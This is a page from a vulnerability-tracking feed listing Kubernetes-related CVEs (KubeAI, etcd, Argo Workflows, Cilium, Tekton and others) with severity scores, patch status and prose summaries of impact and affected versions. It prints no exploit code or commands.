HIGH PATCH This Week

Command injection in KubeAI Ollama model controller allows Kubernetes users with Model CRD write permissions to execute arbitrary shell commands inside model server pods. The vulnerability stems from unsanitized URL components (model ref and query parameters) being interpolated into bash startup probe scripts. With CVSS 8.7 (AV:N/AC:L/PR:H/UI:N/S:C), this represents a significant privilege escalation risk in multi-tenant clusters where Model creation is delegated to non-admin users. No public exploit identified at time of analysis, though detailed proof-of-concept payloads are documented in the GitHub advisory.

Kubernetes Command Injection
NVD GitHub
EPSS 0% CVSS 7.7
HIGH PATCH This Week

Server-Side Request Forgery in PraisonAI's passthrough API allows authenticated remote attackers to access internal cloud metadata services and private network resources. The vulnerability affects the praisonai Python package where the passthrough() and apassthrough() functions accept unvalidated caller-controlled api_base parameters that are directly concatenated and passed to httpx requests. With default AUTH_ENABLED=False configuration, this is remotely exploitable to retrieve EC2 IAM credent

SSRF Elastic Redis +2
NVD GitHub
EPSS 0% CVSS 7.5
HIGH PATCH This Week

A path traversal vulnerability (CVSS 7.5). High severity vulnerability requiring prompt remediation. Vendor patch is available.

Python Path Traversal Docker +2
NVD GitHub VulDB
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Command injection in Flannel's experimental Extension backend allows authenticated Kubernetes users with node annotation privileges to execute arbitrary commands as root on all flannel nodes in the cluster. This affects Flannel versions prior to 0.28.2 using the Extension backend; other backends (vxlan, wireguard) are unaffected. No public exploit identified at time of analysis, but CVSS 7.5 reflects high impact once node annotation access is achieved. EPSS data not available for this recent CVE (2026 designation appears to be error; actual 2025 advisory).

Kubernetes Command Injection Suse
NVD GitHub
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Cilium Network Policy enforcement is bypassed for traffic from pods to L7 Services with local backends on the same node when Per-Endpoint Routing is enabled and BPF Host Routing is disabled, allowing authenticated local attackers to circumvent ingress network policies and access restricted services. This affects Cilium v1.19.0-v1.19.1, v1.18.0-v1.18.7, and all versions prior to v1.17.13, with the most common vulnerable deployment being Amazon EKS with Cilium ENI mode. Vendor-released patches are available (v1.19.2, v1.18.8, v1.17.14), and no public exploit code has been identified at the time of analysis.

Microsoft Kubernetes Authentication Bypass +1
NVD GitHub
EPSS 0% CVSS 7.5
HIGH PATCH This Week

LiquidJS versions 10.24.x and earlier contain a memory limit bypass vulnerability that allows unauthenticated attackers to crash Node.js processes through a single malicious template. By exploiting reverse range expressions to drive the memory counter negative, attackers can allocate unlimited memory and trigger a V8 Fatal error that terminates the entire process, causing complete denial of service. A detailed proof-of-concept exploit is publicly available demonstrating the full attack chain from bypass to process crash.

Node.js Denial Of Service Kubernetes +1
NVD GitHub
EPSS 0% CVSS 6.3
MEDIUM This Month

A SSRF vulnerability (CVSS 6.3) that allows an attacker. Remediation should follow standard vulnerability management procedures.

XXE SSRF Kubernetes
NVD GitHub VulDB
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

The Kubernetes NFS CSI Driver fails to properly validate the subDir parameter in volume identifiers, allowing privileged users to inject path traversal sequences that bypass intended directory restrictions. Attackers with PersistentVolume creation privileges can craft malicious volume identifiers to access and modify arbitrary directories on the NFS server during cleanup operations. No patch is currently available for this medium-severity vulnerability affecting Kubernetes environments.

Kubernetes Path Traversal Suse
NVD GitHub VulDB
EPSS 0% CVSS 8.8
HIGH PATCH This Week

This is an authentication and authorization bypass vulnerability in etcd's gRPC API layer that allows unauthorized users to execute privileged operations when etcd auth is enabled. Affected are etcd versions prior to 3.4.42, 3.5.28, and 3.6.9 (specifically the Go packages go.etcd.io/etcd/v3 and go.etcd.io/etcd). Attackers can enumerate cluster topology via MemberList, trigger denial of service through Alarm APIs, manipulate Lease operations affecting TTL-based keys, and force compaction to permanently delete historical data. Standard Kubernetes deployments are not affected as they do not rely on etcd's built-in authentication. No EPSS score or KEV listing is currently available, and the vulnerability was responsibly disclosed by multiple security researchers.

Kubernetes Denial Of Service Authentication Bypass +2
NVD GitHub VulDB
EPSS 1% CVSS 5.9
MEDIUM PATCH This Month

An authenticated user with restricted RBAC permissions on specific key ranges in etcd can use nested transactions to completely bypass key-level authorization controls and access the entire etcd data store. This affects etcd versions 3.4.x before 3.4.42, 3.5.x before 3.5.28, and 3.6.x before 3.6.9. While Kubernetes deployments are typically protected because Kubernetes handles authentication and authorization at the API server layer rather than relying on etcd's built-in controls, direct etcd deployments with RBAC restrictions are at significant risk.

Kubernetes Authentication Bypass Red Hat +1
NVD GitHub VulDB
EPSS 3% CVSS 8.1
HIGH PATCH This Week

Path traversal in Apple and Kubernetes DAG management APIs allows authenticated attackers to access arbitrary files outside the intended directory by injecting URL-encoded forward slashes into file name parameters on GET, DELETE, RENAME, and EXECUTE endpoints. The vulnerability affects systems where a previous patch (CVE-2026-27598) only secured the CREATE endpoint while leaving other API functions unprotected. An attacker with valid credentials can read, modify, or execute unintended DAG files on the affected system.

Path Traversal Apple Kubernetes +2
NVD GitHub VulDB
EPSS 0% CVSS 8.7
HIGH This Week

Budibase, a low-code platform distributed as a Docker/Kubernetes application, contains a Server-Side Request Forgery (SSRF) vulnerability in its REST datasource query preview endpoint. Authenticated admin users can force the server to make HTTP requests to arbitrary URLs including cloud metadata services, internal networks, and Kubernetes APIs. A detailed proof-of-concept exists demonstrating theft of GCP OAuth2 tokens with cloud-platform scope, CouchDB credential extraction, and internal service enumeration. The CVSS score of 8.7 reflects high confidentiality and integrity impact with changed scope, requiring high privileges but low attack complexity.

Microsoft Redis Google +3
NVD GitHub VulDB
EPSS 0% CVSS 9.6
CRITICAL PATCH Act Now

The Tekton Pipelines git resolver contains a path traversal vulnerability allowing authenticated tenants to read arbitrary files from the resolver pod's filesystem via the pathInRepo parameter. Affected products include github.com/tektoncd/pipeline versions 1.0.0 through 1.10.0 across multiple release branches. The vulnerability enables credential exfiltration and privilege escalation from namespace-scoped access to cluster-wide secret reading capabilities. A proof-of-concept was provided by the vulnerability reporter Oleh Konko.

Path Traversal Privilege Escalation Kubernetes
NVD GitHub VulDB
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

A denial of service vulnerability (CVSS 6.5). Remediation should follow standard vulnerability management procedures.

Denial Of Service Kubernetes Red Hat +1
NVD GitHub VulDB
EPSS 0% CVSS 7.1
HIGH PATCH This Week

The kube-router proxy module fails to validate Service externalIPs and LoadBalancer IPs against configured IP ranges, allowing namespace-scoped users to bind arbitrary VIPs on all cluster nodes and hijack traffic to critical services like kube-dns. This affects all kube-router v2.x versions including v2.7.1, primarily impacting multi-tenant clusters where untrusted users have Service creation permissions. A detailed proof-of-concept demonstrates single-command cluster DNS takedown and arbitrary VIP binding with traffic redirection to attacker-controlled pods, though EPSS scoring is not available for this recently disclosed vulnerability.

Kubernetes Denial Of Service Authentication Bypass +2
NVD GitHub VulDB
EPSS 0% CVSS 7.1
HIGH PATCH This Week

CVE-2026-32769 is a security vulnerability. Remediation should follow standard vulnerability management procedures. Vendor patch is available.

Kubernetes Authentication Bypass Suse
NVD GitHub VulDB
EPSS 0% CVSS 7.9
HIGH PATCH This Week

CVE-2026-32768 is a security vulnerability. Remediation should follow standard vulnerability management procedures. Vendor patch is available.

Kubernetes Authentication Bypass Suse
NVD GitHub VulDB
EPSS 0% CVSS 7.1
HIGH POC PATCH This Week

A misconfigured NetworkPolicy in Kubernetes deployments allows attackers to perform unauthorized lateral movement between namespaces, breaking namespace isolation security boundaries. This vulnerability affects Kubernetes environments with improperly configured inter-namespace NetworkPolicies, specifically those with 'inter-ns' prefixed policies in monitoring namespaces. An attacker who compromises any component can pivot to access resources in other namespaces, potentially accessing sensitive data or systems they shouldn't have access to.

Kubernetes Authentication Bypass Suse
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

OneUptime versions prior to 10.0.24 contain a sensitive information exposure vulnerability where the password reset flow logs complete password reset URLs containing plaintext reset tokens at the INFO log level, which is enabled by default in production environments. Any actor with access to application logs-including log aggregation systems, Docker logs, or Kubernetes pod logs-can extract these tokens and perform account takeover on any user. The vulnerability is fixed in version 10.0.24.

Kubernetes Docker Information Disclosure +1
NVD GitHub VulDB
EPSS 0% CVSS 4.8
MEDIUM This Month

Silent event loss in Inspektor Gadget prior to 0.50.1 allows local attackers to cause denial of service by filling the 256KB ring-buffer, which triggers undetected data drops without alerting users or administrators. When the buffer becomes full, gadgets silently discard events and fail to report the loss count, potentially hiding critical system events from Kubernetes cluster and Linux host monitoring. A local attacker with limited privileges can exploit this to obscure malicious activity or system anomalies by saturating the instrumentation buffer.

Linux Kubernetes Denial Of Service +1
NVD GitHub VulDB
EPSS 0% CVSS 6.8
MEDIUM PATCH This Month

Medium severity vulnerability in HashiCorp Consul. HashiCorp Consul and Consul Enterprise 1.18.20 up to 1.21.10 and 1.22.4 are vulnerable to arbitrary file read when configured with Kubernetes authentication. This vulnerability, CVE-2026-2808, is fixed in Consul 1.18.21, 1.21.11 and 1.22.5.

Kubernetes Information Disclosure Red Hat +1
NVD VulDB
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Kubernetes flagd feature flag daemon versions before 0.14.2 are vulnerable to denial of service through unbounded memory allocation on publicly accessible evaluation endpoints. An unauthenticated attacker can send HTTP requests with arbitrarily large payloads to exhaust memory and crash the service. This affects deployments without external authentication controls, allowing trivial process termination in containerized environments.

Kubernetes Denial Of Service Suse
NVD GitHub VulDB
EPSS 0% CVSS 8.9
HIGH POC PATCH This Week

Authorization bypass in Argo Workflows (2.9.0 through 4.0.1 and 3.7.x before 3.7.11) lets any user permitted to submit Workflows override admin-defined WorkflowTemplate security controls by attaching a podSpecPatch to their submission. Because podSpecPatch is merged with Workflow-spec precedence and applied to the pod with no security validation, even controllers locked down with templateReferencing: Strict can be circumvented to run arbitrary pod settings such as privileged: true. Publicly available exploit code exists, but EPSS is low (0.04%) and it is not in CISA KEV.

Kubernetes Authentication Bypass Argo Workflows
NVD GitHub VulDB
EPSS 0% CVSS 7.5
HIGH POC PATCH This Week

Information disclosure in Argo Workflows before 4.0.2 and 3.7.11 lets any unauthenticated client read WorkflowTemplates and ClusterWorkflowTemplates by sending a bogus 'Authorization: Bearer nothing' token, leaking embedded Secret manifests and other sensitive template content. The CVSS 3.1 base score is 7.5 (confidentiality-only, network, no privileges) and publicly available exploit code exists, though EPSS is very low (0.04%) and it is not in CISA KEV, indicating no confirmed widespread exploitation yet.

Kubernetes Authentication Bypass Argo Workflows
NVD GitHub VulDB
EPSS 0% CVSS 4.3
MEDIUM PATCH This Month

Kubewarden's deprecated host-callback APIs in AdmissionPolicy can be exploited by authenticated users with policy creation permissions to gain unauthorized read access to cluster-level resources including Ingresses, Namespaces, and Services. An attacker with privileged AdmissionPolicy creation permissions—not a default privilege—could craft malicious policies to bypass intended access controls and enumerate sensitive cluster infrastructure, though this vulnerability is limited to read-only access without write capability or access to Secrets and ConfigMaps. The vulnerability affects Kubernetes deployments using Kubewarden and currently has no available patch.

Kubernetes Privilege Escalation Authentication Bypass
NVD GitHub VulDB
EPSS 0% CVSS 8.8
HIGH POC This Week

Arbitrary code execution in ingress-nginx controllers via malicious rewrite-target annotations allows authenticated attackers to execute commands and exfiltrate cluster secrets. Kubernetes administrators using ingress-nginx are at risk, particularly in default configurations where the controller has cluster-wide secret access. No patch is currently available.

Nginx Kubernetes RCE
NVD GitHub
EPSS 0% CVSS 8.2
HIGH POC PATCH This Week

Zarf is an Airgap Native Packager Manager for Kubernetes. [CVSS 8.2 HIGH]

Kubernetes Path Traversal Zarf +1
NVD GitHub
EPSS 0% CVSS 8.1
HIGH This Week

LangSmith Studio contains a URL parameter injection vulnerability that allows attackers to steal authentication tokens, user IDs, and workspace credentials from users who click malicious links, enabling account takeover and unauthorized access to workspace resources. Both LangSmith Cloud and self-hosted Kubernetes deployments are affected, with exploitation requiring social engineering to trick authenticated users into clicking attacker-controlled URLs. No patch is currently available for this high-severity vulnerability (CVSS 8.1).

Kubernetes Authentication Bypass Langsmith +2
NVD GitHub VulDB
EPSS 0% CVSS 8.2
HIGH PATCH This Week

Path traversal in Kaniko 1.25.4 through 1.25.9 allows attackers to extract tar archives outside the intended destination directory, enabling arbitrary file writes on the build system. When combined with Docker credential helpers in registry authentication scenarios, this vulnerability can be leveraged for code execution within the Kaniko executor process. Docker and Kubernetes environments using the affected Kaniko versions are at risk.

Docker Kubernetes Kaniko +2
NVD GitHub
EPSS 0%
NONE POC PATCH Awaiting Data

Kruise provides automated management of large-scale applications on Kubernetes. Prior to versions 1.8.3 and 1.7.5, PodProbeMarker allows defining custom probes with TCPSocket or HTTPGet handlers.

Kubernetes SSRF
NVD GitHub
EPSS 0% CVSS 10.0
CRITICAL PATCH Act Now

Arbitrary host file exfiltration from Cloud Hypervisor VMM versions 34.0-50.0. CVSS 10.0. Patch available.

KVM Linux Information Disclosure +4
NVD GitHub
EPSS 0% CVSS 8.1
HIGH This Week

Strimzi Kafka Operator versions 0.49.0-0.50.0 incorrectly trusts all intermediate CAs in a multistage certificate chain for mTLS authentication, allowing any user with a certificate signed by any CA in the chain to authenticate to Kafka listeners. This authentication bypass affects only deployments using custom Cluster or Clients CA with multi-level CA chains. No patch is currently available.

Apache Kubernetes Strimzi Kafka Operator +1
NVD GitHub
EPSS 0% CVSS 5.9
MEDIUM This Month

Strimzi versions 0.47.0 through 0.50.0 improperly trust all certificates in a CA chain rather than only the intended signing authority, allowing Kafka Connect and MirrorMaker 2 operands to accept connections from brokers with certificates signed by intermediate CAs. An attacker could leverage this improper certificate validation to establish unauthorized connections to Kafka clusters using alternate CA-signed certificates from the trusted chain. This vulnerability requires high privileges to configure the CA chain and has no available patch at this time.

Apache Kubernetes Strimzi +1
NVD GitHub
Prev Page 2 of 7 Next

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy